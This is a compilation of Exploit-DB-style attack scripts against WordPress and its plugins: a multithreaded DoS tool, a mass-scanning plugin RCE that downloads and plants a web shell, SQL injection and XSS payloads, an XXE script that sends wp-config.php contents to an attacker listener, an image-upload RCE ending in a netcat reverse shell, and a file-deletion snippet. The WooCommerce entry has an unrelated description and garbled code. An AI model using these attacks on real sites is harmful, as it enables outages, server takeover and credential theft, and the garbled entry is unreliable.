# EDB Note: python doser.py -g 'http://localhost/wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter&ver=4.9' -t 9999
import requests
import sys
import threading
import random
import re
import argparse
host=''
headers_useragents=[]
request_counter=0
printedMsgs = []
def printMsg(msg):
if msg not in printedMsgs:
print "\n"+msg + " after %i requests" % request_counter
printedMsgs.append(msg)
def useragent_list():
global headers_useragents
headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
return(headers_useragents)
def randomString(size):
out_str = ''
for i in range(0, size):
a = random.randint(65, 90)
out_str += chr(a)
return(out_str)
def initHeaders():
useragent_list()
global headers_useragents, additionalHeaders
headers = {
'User-Agent': random.choice(headers_useragents),
'Cache-Control': 'no-cache',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Referer': "http://www.google.com/?q=" + randomString(random.randint(5,10)),
'Keep-Alive': random.randint(110,120),
'Connection': 'keep-alive'
}
if additionalHeaders:
for header in additionalHeaders:
headers.update({header.split(":")[0]:header.split(":")[1]})
return headers
def handleStatusCodes(status_code):
global request_counter
sys.stdout.write("\rNumber of requests sent %i" % request_counter)
sys.stdout.flush()
if status_code == 429:
printMsg("You have been throttled")
if status_code == 500:
printedMsg("Status code 500 received")
def sendGET(url):
global request_counter
headers = initHeaders()
try:
request_counter+=1
request = requests.get(url, headers=headers)
handleStatusCodes(request.status_code)
except e:
pass
def sendPOST(url, payload):
global request_counter
headers = initHeaders()
try:
request_counter+=1
if payload:
request = requests.post(url, data=payload, headers=headers)
else:
request = requests.post(url, headers=headers)
handleStatusCodes(request.status_code)
except e:
pass
class SendGETThread(threading.Thread):
def run(self):
try:
while True:
global url
sendGET(url)
except:
pass
class SendPOSTThread(threading.Thread):
def run(self):
try:
while True:
global url, payload
sendPOST(url, payload)
except:
pass
# TODO:
# check if the site stop responding and alert
def main(argv):
parser = argparse.ArgumentParser(description='Sending unlimited amount of requests in order to perform DoS attacks. Written by Barak Tawily')
parser.add_argument('-g', help='Specify GET request. Usage: -g \'<url>\'')
parser.add_argument('-p', help='Specify POST request. Usage: -p \'<url>\'')
parser.add_argument('-d', help='Specify data payload for POST request', default=None)
parser.add_argument('-ah', help='Specify addtional header/s. Usage: -ah \'Content-type: application/json\' \'User-Agent: Doser\'', default=None, nargs='*')
parser.add_argument('-t', help='Specify number of threads to be used', default=500, type=int)
args = parser.parse_args()
global url, payload, additionalHeaders
additionalHeaders = args.ah
payload = args.d
if args.g:
url = args.g
for i in range(args.t):
t = SendGETThread()
t.start()
if args.p:
url = args.p
for i in range(args.t):
t = SendPOSTThread()
t.start()
if len(sys.argv)==1:
parser.print_help()
exit()
if __name__ == "__main__":
main(sys.argv[1:])
# Exploit Title: Wordpress Augmented-Reality - Remote Code Execution Unauthenticated
# Date: 2023-09-20
# Author: Milad Karimi (Ex3ptionaL)
# Category : webapps
# Tested on: windows 10 , firefox
import requests as req
import json
import sys
import random
import uuid
import urllib.parse
import urllib3
from multiprocessing.dummy import Pool as ThreadPool
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
filename="{}.php".format(str(uuid.uuid4())[:8])
proxies = {}
#proxies = {
# 'http': 'http://127.0.0.1:8080',
# 'https': 'http://127.0.0.1:8080',
#}
phash = "l1_Lw"
r=req.Session()
user_agent={
"User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
}
r.headers.update(user_agent)
def is_json(myjson):
try:
json_object = json.loads(myjson)
except ValueError as e:
return False
return True
def mkfile(target):
data={"cmd" : "mkfile", "target":phash, "name":filename}
resp=r.post(target, data=data)
respon = resp.text
if resp.status_code == 200 and is_json(respon):
resp_json=respon.replace(r"\/", "").replace("\\", "")
resp_json=json.loads(resp_json)
return resp_json["added"][0]["hash"]
else:
return False
def put(target, hash):
content=req.get("https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php", proxies=proxies, verify=False)
content=content.text
data={"cmd" : "put", "target":hash, "content": content}
respon=r.post(target, data=data, proxies=proxies, verify=False)
if respon.status_code == 200:
return True
def exploit(target):
try:
vuln_path = "{}/wp-content/plugins/augmented-reality/vendor/elfinder/php/connector.minimal.php".format(target)
respon=r.get(vuln_path, proxies=proxies, verify=False).status_code
if respon != 200:
print("[FAIL] {}".format(target))
return
hash=mkfile(vuln_path)
if hash == False:
print("[FAIL] {}".format(target))
return
if put(vuln_path, hash):
shell_path = "{}/wp-content/plugins/augmented-reality/file_manager/{}".format(target,filename)
status = r.get(shell_path, proxies=proxies, verify=False).status_code
if status==200 :
with open("result.txt", "a") as newline:
newline.write("{}\n".format(shell_path))
newline.close()
print("[OK] {}".format(shell_path))
return
else:
print("[FAIL] {}".format(target))
return
else:
print("[FAIL] {}".format(target))
return
except req.exceptions.SSLError:
print("[FAIL] {}".format(target))
return
except req.exceptions.ConnectionError:
print("[FAIL] {}".format(target))
return
def main():
threads = input("[?] Threads > ")
list_file = input("[?] List websites file > ")
print("[!] all result saved in result.txt")
with open(list_file, "r") as file:
lines = [line.rstrip() for line in file]
th = ThreadPool(int(threads))
th.map(exploit, lines)
if __name__ == "__main__":
main()
# Exploit Title: WordPress adivaha Travel Plugin 2.3 - SQL Injection
# Exploit Author: CraCkEr
# Date: 29/07/2023
# Vendor: adivaha - Travel Tech Company
# Vendor Homepage: https://www.adivaha.com/
# Software Link: https://wordpress.org/plugins/adiaha-hotel/
# Demo: https://www.adivaha.com/demo/adivaha-online/
# Version: 2.3
# Tested on: Windows 10 Pro
# Impact: Database Access
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.
Path: /mobile-app/v3/
GET parameter 'pid' is vulnerable to SQL Injection
https://website/mobile-app/v3/?pid=[SQLI]&isMobile=chatbot
---
Parameter: pid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: pid=77A89299'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&isMobile=chatbot
---
[-] Done
# Exploit Title: WordPress adivaha Travel Plugin 2.3 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 29/07/2023
# Vendor: adivaha - Travel Tech Company
# Vendor Homepage: https://www.adivaha.com/
# Software Link: https://wordpress.org/plugins/adiaha-hotel/
# Demo: https://www.adivaha.com/demo/adivaha-online/
# Version: 2.3
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
Path: /mobile-app/v3/
GET parameter 'isMobile' is vulnerable to XSS
https://www.website/mobile-app/v3/?pid=77A89299&isMobile=[XSS]
XSS Payload: clq95"><script>alert(1)</script>lb1ra
[-] Done
# Exploit Title: WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)
# Date: 16/09/2021
# Exploit Author: David Utón (M3n0sD0n4ld)
# Vendor Homepage: https://wordpress.com
# Affected Version: WordPress 5.6-5.7 & PHP8
# Tested on: Linux Ubuntu 18.04.5 LTS
# CVE : CVE-2021-29447
#!/bin/bash
# Author: @David_Uton (m3n0sd0n4ld)
# Usage: $./CVE-2021-29447.sh TARGET WP_USERNAME WP_PASSWORD PATH/FILE.EXT LHOST
# Example: $ ./CVE-2021-29447.sh 10.10.XX.XX wptest test ../wp-config.php 10.11.XX.XX
# Variables
rHost=$1
username=$2
password=$3
readFile=$4
lHost=$5
# Functions
# Logotype
logoType(){
echo "
=====================================
CVE-2021-29447 - WordPress 5.6-5.7 - XXE & SSRF Within the Media Library (Authenticated)
-------------------------------------
@David_Uton (M3n0sD0n4ld)
https://m3n0sd0n4ld.github.io/
====================================="
}
# Create wav malicious
wavCreate(){
echo -en "RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version='1.0'?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM 'http://$lHost:8000/xx3.dtd'>%remote;%init;%trick;]>\x00" > payload.wav && echo "[+] Create payload.wav"
}
# Create xx3.dtd
dtdCreate(){
cat <<EOT > xx3.dtd
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=$readFile">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://$lHost:8000/?p=%file;'>" >
EOT
}
# wav upload
wavUpload(){
cat <<EOT > .upload.py
#/usr/bin/env python3
import requests, re, sys
postData = {
'log':"$username",
'pwd':"$password",
'wp-submit':'Log In',
'redirect_to':'http://$rHost/wp-admin/',
'testcookie':1
}
r = requests.post('http://$rHost/wp-login.php',data=postData, verify=False) # SSL == verify=True
cookies = r.cookies
print("[+] Getting Wp Nonce ... ")
res = requests.get('http://$rHost/wp-admin/media-new.php',cookies=cookies)
wp_nonce_list = re.findall(r'name="_wpnonce" value="(\w+)"',res.text)
if len(wp_nonce_list) == 0 :
print("[-] Failed to retrieve the _wpnonce")
exit(0)
else :
wp_nonce = wp_nonce_list[0]
print("[+] Wp Nonce retrieved successfully ! _wpnonce : " + wp_nonce)
print("[+] Uploading the wav file ... ")
postData = {
'name': 'payload.wav',
'action': 'upload-attachment',
'_wpnonce': wp_nonce
}
wav = {'async-upload': ('payload.wav', open('payload.wav', 'rb'))}
r_upload = requests.post('http://$rHost/wp-admin/async-upload.php', data=postData, files=wav, cookies=cookies)
if r_upload.status_code == 200:
image_id = re.findall(r'{"id":(\d+),',r_upload.text)[0]
_wp_nonce=re.findall(r'"update":"(\w+)"',r_upload.text)[0]
print('[+] Wav uploaded successfully')
else :
print("[-] Failed to receive a response for uploaded! Try again . \n")
exit(0)
EOT
python3 .upload.py
}
# Server Sniffer
serverSniffer(){
statusServer=$(python3 -m http.server &> http.server.log & echo $! > http.server.pid)
}
# Load file and decoder
loadFile(){
content="http.server.log"
wavUpload
while :
do
if [[ -s $content ]]; then
echo "[+] Obtaining file information..."
sleep 5s # Increase time if the server is slow
base64=$(cat $content | grep -i '?p=' | cut -d '=' -f2 | cut -d ' ' -f1 | sort -u)
# Check file exists
echo "<?php echo zlib_decode(base64_decode('$base64')); ?>" > decode.php
sizeCheck=$(wc -c decode.php | awk '{printf $1}')
if [[ $sizeCheck -gt "46" ]]; then
php decode.php
else
echo "[!] File does not exist or is not allowed to be read."
fi
break
fi
done
}
# Cleanup
cleanup(){
kill $(cat http.server.pid) &>/dev/null
rm http.server.log http.server.pid &>/dev/null
rm xx3.dtd payload.wav .upload.py decode.php .cookies.tmp &>/dev/null
}
# Execute
logoType
# Checking parameters
if [[ $# -ne 5 ]];then
echo "[!] Parameters are missing!!!"
echo ""
echo "$ ./CVE-2021-29447.sh TARGET WP_USERNAME WP_PASSWORD PATH/FILE.EXT LHOST"
else
# Test Connection...
echo "[*] Test connection to WordPress..."
# WP Auth
authCheck=$(curl -i -s -k -X $'POST' \
-H "Host: $rHost" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H "Referer: http://$rHost/wp-login.php" -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 79' -H "Origin: http://$rHost" -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
-b $'wordpress_test_cookie=WP%20Cookie%20check' \
--data-binary "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1" \
"http://$rHost/wp-login.php" > .cookies.tmp)
auth=$(head -n 1 .cookies.tmp | awk '{ printf $2 }')
# Running authentication with WordPress.
if [[ $auth != "302" ]]; then
echo "[-] Authentication failed ! Check username and password"
else
echo "[+] Authentication successfull!!!"
# Create wav & dtd file
wavCreate
dtdCreate
serverSniffer
loadFile
cleanup
fi
fi
# Exploit Title: WordPress 5.0.0 - Image Remote Code Execution
# Date: 2020-02-01
# Exploit Authors: OUSSAMA RAHALI ( aka V0lck3r)
# Discovery Author : RIPSTECH Technology
# Version: WordPress 5.0.0 and <= 4.9.8 .
# References : CVE-2019-89242 | CVE-2019-89242 | https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
#/usr/bin/env python3
import requests
import re
import sys
from datetime import datetime
banner = """
__ __ _ ____ ____ _____
\ \ / /__ _ __ __| |_ __ _ __ ___ ___ ___ | _ \ / ___| ____|
\ \ /\ / / _ \| '__/ _` | '_ \| '__/ _ \/ __/ __| | |_) | | | _|
\ V V / (_) | | | (_| | |_) | | | __/\__ \__ \ | _ <| |___| |___
\_/\_/ \___/|_| \__,_| .__/|_| \___||___/___/ |_| \_\\____|_____|
|_|
5.0.0 and <= 4.9.8
"""
print(banner)
print("usage :")
print("=======")
usage = 'python3 RCE_wordpress.py http://<IP>:<PORT>/ <Username> <Password> <WordPress_theme>'
print(usage)
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
wp_theme = sys.argv[4] # wpscan results
lhost = '10.10.10.10' #attacker ip
lport = '4141' #listening port
date = str(datetime.now().strftime('%Y'))+'/'+str(datetime.now().strftime('%m'))+'/'
imagename = 'gd.jpg'
# ======
# Note :
# ======
# It could be any jpg image, BUT there are some modifications first :
# 1- image name as : "gd.jpg"
# 2- place the image in the same directory as this exploit.
# 3- inject the php payload via exiftool : exiftool gd.jpg -CopyrightNotice="<?=\`\$_GET[0]\`?>"
data = {
'log':username,
'pwd':password,
'wp-submit':'Log In',
'redirect_to':url+'wp-admin/',
'testcookie':1
}
r = requests.post(url+'wp-login.php',data=data)
if r.status_code == 200:
print("[+] Login successful.\n")
else:
print("[-] Failed to login.")
exit(0)
cookies = r.cookies
print("[+] Getting Wp Nonce ... ")
res = requests.get(url+'wp-admin/media-new.php',cookies=cookies)
wp_nonce_list = re.findall(r'name="_wpnonce" value="(\w+)"',res.text)
if len(wp_nonce_list) == 0 :
print("[-] Failed to retrieve the _wpnonce \n")
exit(0)
else :
wp_nonce = wp_nonce_list[0]
print("[+] Wp Nonce retrieved successfully ! _wpnonce : " + wp_nonce+"\n")
print("[+] Uploading the image ... ")
data = {
'name': 'gd.jpg',
'action': 'upload-attachment',
'_wpnonce': wp_nonce
}
image = {'async-upload': (imagename, open(imagename, 'rb'))}
r_upload = requests.post(url+'wp-admin/async-upload.php', data=data, files=image, cookies=cookies)
if r_upload.status_code == 200:
image_id = re.findall(r'{"id":(\d+),',r_upload.text)[0]
_wp_nonce=re.findall(r'"update":"(\w+)"',r_upload.text)[0]
print('[+] Image uploaded successfully ! Image ID :'+ image_id+"\n")
else :
print("[-] Failed to receive a response for uploaded image ! try again . \n")
exit(0)
print("[+] Changing the path ... ")
data = {
'_wpnonce':_wp_nonce,
'action':'editpost',
'post_ID':image_id,
'meta_input[_wp_attached_file]':date+imagename+'?/../../../../themes/'+wp_theme+'/rahali'
}
res = requests.post(url+'wp-admin/post.php',data=data, cookies=cookies)
if res.status_code == 200:
print("[+] Path has been changed successfully. \n")
else :
print("[-] Failed to change the path ! Make sure the theme is correcte .\n")
exit(0)
print("[+] Getting Ajax nonce ... ")
data = {
'action':'query-attachments',
'post_id':0,
'query[item]':43,
'query[orderby]':'date',
'query[order]':'DESC',
'query[posts_per_page]':40,
'query[paged]':1
}
res = requests.post(url+'wp-admin/admin-ajax.php',data=data, cookies=cookies)
ajax_nonce_list=re.findall(r',"edit":"(\w+)"',res.text)
if res.status_code == 200 and len(ajax_nonce_list) != 0 :
ajax_nonce = ajax_nonce_list[0]
print('[+] Ajax Nonce retrieved successfully ! ajax_nonce : '+ ajax_nonce+'\n')
else :
print("[-] Failed to retrieve ajax_nonce.\n")
exit(0)
print("[+] Cropping the uploaded image ... ")
data = {
'action':'crop-image',
'_ajax_nonce':ajax_nonce,
'id':image_id,
'cropDetails[x1]':0,
'cropDetails[y1]':0,
'cropDetails[width]':200,
'cropDetails[height]':100,
'cropDetails[dst_width]':200,
'cropDetails[dst_height]':100
}
res = requests.post(url+'wp-admin/admin-ajax.php',data=data, cookies=cookies)
if res.status_code == 200:
print("[+] Done . \n")
else :
print("[-] Erorr ! Try again \n")
exit(0)
print("[+] Creating a new post to include the image... ")
res = requests.post(url+'wp-admin/post-new.php', cookies=cookies)
if res.status_code == 200:
_wpnonce = re.findall(r'name="_wpnonce" value="(\w+)"',res.text)[0]
post_id = re.findall(r'"post":{"id":(\w+),',res.text)[0]
print("[+] Post created successfully . \n")
else :
print("[-] Erorr ! Try again \n")
exit(0)
data={
'_wpnonce':_wpnonce,
'action':'editpost',
'post_ID':post_id,
'post_title':'RCE poc by v0lck3r',
'post_name':'RCE poc by v0lck3r',
'meta_input[_wp_page_template]':'cropped-rahali.jpg'
}
res = requests.post(url+'wp-admin/post.php',data=data, cookies=cookies)
if res.status_code == 200:
print("[+] POC is ready at : "+url+'?p='+post_id+'&0=id\n')
print("[+] Executing payload !")
requests.get(f"{url}?p={post_id}&0=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20{lhost}%20{lport}%20%3E%2Ftmp%2Ff",cookies=cookies)
else :
print("[-] Erorr ! Try again (maybe change the payload) \n")
exit(0)
# Exploit Title: Wordpress 4.9.6 - Arbitrary File Deletion (Authenticated) (2)
# Date: 04/08/2021
# Exploit Author: samguy
# Vulnerability Discovery By: Slavco Mihajloski & Karim El Ouerghemmi
# Vendor Homepage: https://wordpress.org
# Software Link: https://wordpress.org/wordpress-4.9.6.tar.gz
# Version: 4.9.6
# Tested on: Linux - Debian Buster (PHP 7.3)
# Ref : https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution
# EDB : EDB-44949
# CVE : CVE-2018-12895
/*
Usage:
1. Login to wordpress with privileges of an author
2. Navigates to Media > Add New > Select Files > Open/Upload
3. Click Edit > Open Developer Console > Paste this exploit script
4. Execute the function, eg: unlink_thumb("../../../../wp-config.php")
*/
function unlink_thumb(thumb) {
$nonce_id = document.getElementById("_wpnonce").value
if (thumb == null) {
console.log("specify a file to delete")
return false
}
if ($nonce_id == null) {
console.log("the nonce id is not found")
return false
}
fetch(window.location.href.replace("&action=edit",""),
{
method: 'POST',
credentials: 'include',
headers: {'Content-Type': 'application/x-www-form-urlencoded'},
body: "action=editattachment&_wpnonce=" + $nonce_id + "&thumb=" + thumb
})
.then(function(resp0) {
if (resp0.redirected) {
$del = document.getElementsByClassName("submitdelete deletion").item(0).href
if ($del == null) {
console.log("Unknown error: could not find the url action")
return false
}
fetch($del,
{
method: 'GET',
credentials: 'include'
}).then(function(resp1) {
if (resp1.redirected) {
console.log("Arbitrary file deletion of " + thumb + " succeed!")
return true
} else {
console.log("Arbitrary file deletion of " + thumb + " failed!")
return false
}
})
} else {
console.log("Arbitrary file deletion of " + thumb + " failed!")
return false
}
})
}
# Title: Wordpress Plugin WooCommerce v7.1.0 - Remote Code Execution(RCE)
# Date: 2022-12-07
# Author: Milad Karimi
# Vendor Homepage: https://wordpress.org/plugins/woocommerce
# Software Link: https://wordpress.org/plugins/woocommerce
# Tested on: windows 10 , firefox
# Version: 7.1.0
# CVE : N/A
# Description:
simple, easy to use jQuery frontend to php backend that pings various
devices and changes colors from green to red depending on if device is
up or down.
# PoC :
http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php
http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php
# Vulnerabile code:
95: $classname $classname($post_id);
94: $classname = WC_Product_Factory::get_product_classname($post_id, $product_type : 'simple');
92: ⇓ function save($post_id, $post)
93: $product_type = WC_Product_Factory::get_product_type($post_id) : sanitize_title(stripslashes($_POST['product-type']));
92: ⇓ function save($post_id, $post)